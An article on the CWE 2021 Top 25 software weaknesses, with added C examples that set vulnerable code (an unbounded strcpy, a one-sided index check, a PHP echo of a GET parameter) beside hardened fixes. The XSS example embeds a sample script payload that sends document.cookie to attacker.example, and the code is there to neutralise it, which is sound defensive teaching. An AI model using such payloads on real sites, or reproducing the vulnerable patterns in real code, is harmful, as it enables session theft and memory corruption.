The community project Common Weakness Enumeration (CWE) has published its 2021 evaluation, which draws on two years of data to rank the most dangerous types of software weakness of that period. The resulting "Top 25 Most Dangerous Software Weaknesses" shows, among other things, that memory errors in the form of buffer overflows remain one of the greatest dangers.
The CWE project bases the evaluation on vulnerabilities reported to the National Vulnerability Database (NVD). The overall score combines how often a weakness appears as the root cause of a CVE entry with the average severity (CVSS score) of those entries.
Buffer Overflow
Out-of-bounds Write takes first place with a clear lead. In this variant of the buffer overflow, the software writes data before the beginning or beyond the intended end of a buffer.
In C, for example, the problem arises when a 64-byte buffer is reserved for a host name or IP address, char hostname[64];, but the software never rejects longer input.
Such a buffer overflow may allow an attacker to overwrite adjacent data (a flag, a length field, a saved return address) and thereby alter the further course of the program.
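The hostname example carried through, as an added illustration that is not part of the original article: a hypothetical connection record places a privilege flag directly after the 64-byte buffer, the unsafe setter copies with strcpy() exactly as the article describes, and a hardened setter measures the input first and refuses anything that does not fit. The struct, function names and the 70-byte input are constructed for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define HOSTNAME_LEN 64

/* Hypothetical connection record (constructed for this example). The flag
 * sits right after the buffer, so the 65th byte of a "host name" lands in it. */
struct conn {
    char hostname[HOSTNAME_LEN];
    int  is_admin;
};

/* Vulnerable (CWE-787): strcpy() stops only at the NUL byte of src, so a
 * source longer than 63 characters writes past hostname[63] into is_admin and
 * whatever follows the struct. Kept for comparison; never fed over-long input. */
void set_hostname_unsafe(struct conn *c, const char *src)
{
    strcpy(c->hostname, src);
}

/* Hardened: measure first, refuse what does not fit, terminate explicitly.
 * Silent truncation is avoided on purpose, since a cut-off host name may
 * resolve to a different host than the one the caller meant.
 * Returns 0 on success, -1 if src is too long (record left unchanged). */
int set_hostname_checked(struct conn *c, const char *src)
{
    size_t n = strnlen(src, HOSTNAME_LEN);   /* never scans past 64 bytes */
    if (n >= HOSTNAME_LEN)
        return -1;
    memcpy(c->hostname, src, n);
    c->hostname[n] = '\0';
    return 0;
}

int main(void)
{
    struct conn c = { "", 0 };
    char attack[80];

    /* Constructed over-long input: 70 'A' bytes plus NUL. */
    memset(attack, 'A', 70);
    attack[70] = '\0';

    if (set_hostname_checked(&c, "example.com") == 0)
        printf("accepted: %s (is_admin=%d)\n", c.hostname, c.is_admin);
    if (set_hostname_checked(&c, attack) != 0)
        printf("rejected %zu-byte host name; record unchanged: %s (is_admin=%d)\n",
               strlen(attack), c.hostname, c.is_admin);
    return 0;
}
```

The same pattern applies to every fixed-size buffer: bound the length measurement as well as the copy (strnlen rather than strlen), and decide what to do with over-long input before touching the destination.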
Cross-Site Scripting
Cross-Site Scripting (XSS) landed in second place. XSS vulnerabilities are usually less critical than the other entries in the list, but they are so common that they rank near the top. In this class of vulnerability, JavaScript derived from unchecked input is executed in the victim's browser.
The gap arises when a website inserts user-controlled values directly into the page source, for example by writing the content of a GET parameter into the HTML. In PHP, this code is vulnerable to XSS: echo '<div>'.$_GET["email"].'</div>';
An attacker can craft the input so that JavaScript runs in the context of the website, reads its cookies (unless they carry the HttpOnly flag) and forwards them to a server under the attacker's control.
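The fix for the PHP snippet is output encoding: every user-controlled value is HTML-escaped before it is written into the page, as htmlspecialchars() does in PHP. The following is an added example, not code from the article, written in C to stay in the language of the rest of this page: html_escape() encodes the five characters that let input break out of an HTML text node or attribute, and render_div() builds the <div> from the article with the encoded value. Function names, buffer sizes and the sample payload are constructed for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Encode & < > " ' as HTML entities. Writes a NUL-terminated result into out;
 * returns the number of bytes written (excluding NUL), or -1 if out is too
 * small (out is then set to the empty string). */
long html_escape(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    if (outsz == 0)
        return -1;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char one[2] = { (char)*p, '\0' };
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t l = strlen(rep);
        if (o + l >= outsz) {      /* bounded: no out-of-bounds write either */
            out[0] = '\0';
            return -1;
        }
        memcpy(out + o, rep, l);
        o += l;
    }
    out[o] = '\0';
    return (long)o;
}

/* Safe counterpart of  echo '<div>'.$_GET["email"].'</div>';
 * Returns 0 on success, -1 if the value or the page buffer is too small. */
int render_div(const char *email, char *page, size_t pagesz)
{
    char esc[256];
    if (html_escape(email, esc, sizeof esc) < 0)
        return -1;
    int n = snprintf(page, pagesz, "<div>%s</div>", esc);
    return (n < 0 || (size_t)n >= pagesz) ? -1 : 0;
}

int main(void)
{
    /* Constructed attacker payload for the email parameter. */
    const char *payload = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>";
    char page[512];
    if (render_div(payload, page, sizeof page) == 0)
        printf("%s\n", page);   /* prints the payload as inert text, no <script> tag */
    return 0;
}
```

Encoding must match the context the value lands in: the table above is correct for HTML text and quoted attributes, but a value inserted into a JavaScript string, a URL or a CSS rule needs that context's own encoding.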
Out-of-bounds Read
Out-of-bounds Read climbed to third place. It is the read-access counterpart of the memory error above: the program reads outside the intended buffer and may disclose sensitive data from memory.
For example, if an attacker can influence the index into an array in C/C++ and the code only checks that the index is less than the array length, a negative index passes the check and reads memory that lies before the start of the array.
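The one-sided index check described here, next to a corrected version, as an added example that is not part of the original article. Only the accept/reject decision of the vulnerable check is modelled; the out-of-bounds read itself would be undefined behaviour and is not executed. The lookup table and function names are constructed for this example.

```c
#include <stdio.h>

#define N_ENTRIES 4

/* Constructed lookup table. Whatever lies before table[0] in memory (other
 * globals, possibly secrets) is what a negative index would read. */
static const int table[N_ENTRIES] = { 10, 20, 30, 40 };

/* Vulnerable bounds check (CWE-125): the index is signed and only the upper
 * bound is tested, so -1, -2, ... are accepted and table[index] reads before
 * the array. Returns 1 if the check would let the index through. */
int index_accepted_unsafe(int index)
{
    return index < N_ENTRIES;
}

/* Hardened: test both bounds before dereferencing. The single comparison
 * (size_t)index < N_ENTRIES is equivalent, because a negative int converts to
 * a value far above N_ENTRIES. Returns 0 and stores the value, or -1. */
int lookup_checked(int index, int *out)
{
    if (index < 0 || index >= N_ENTRIES)
        return -1;
    *out = table[index];
    return 0;
}

int main(void)
{
    int idx[] = { 2, 4, -1 };
    for (size_t i = 0; i < sizeof idx / sizeof idx[0]; i++) {
        int v = 0;
        printf("index %2d: unsafe check %s, checked lookup %s",
               idx[i],
               index_accepted_unsafe(idx[i]) ? "accepts" : "rejects",
               lookup_checked(idx[i], &v) == 0 ? "ok" : "rejects");
        if (lookup_checked(idx[i], &v) == 0)
            printf(" (value %d)", v);
        printf("\n");
    }
    return 0;
}
```

The same mistake appears with lengths and offsets taken from network packets or file headers: a check of the form len < max that omits the lower bound, or compares a signed value against an unsigned one, lets negative values through.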
Rising security problems
"Missing Authentication for Critical Function" rose from 24th to 11th place. It covers functions that are not protected by any authentication at all. "Improper Authentication" in 14th place, by contrast, covers cases where authentication exists but is implemented incorrectly.
Other weaknesses also climbed the list. Among them are "Deserialization of Untrusted Data" in 13th place, the deserialization of untrusted input without checking that the result is valid, and "Incorrect Default Permissions", which moved from position 41 to position 19 and covers software that installs files or directories with insecure default permissions; a web server that lists directory contents ("Index of /") by default is a related exposure.
Code injection ("Improper Control of Generation of Code") and incorrect rights management ("Improper Privilege Management") have dropped out of the top 25, but remain important to avoid.
In the description of each weakness type, the CWE project gives tips both on how to identify existing gaps and on how to prevent them. To prevent buffer overflows, for example, the CWE project recommends choosing a memory-safe programming language from the outset.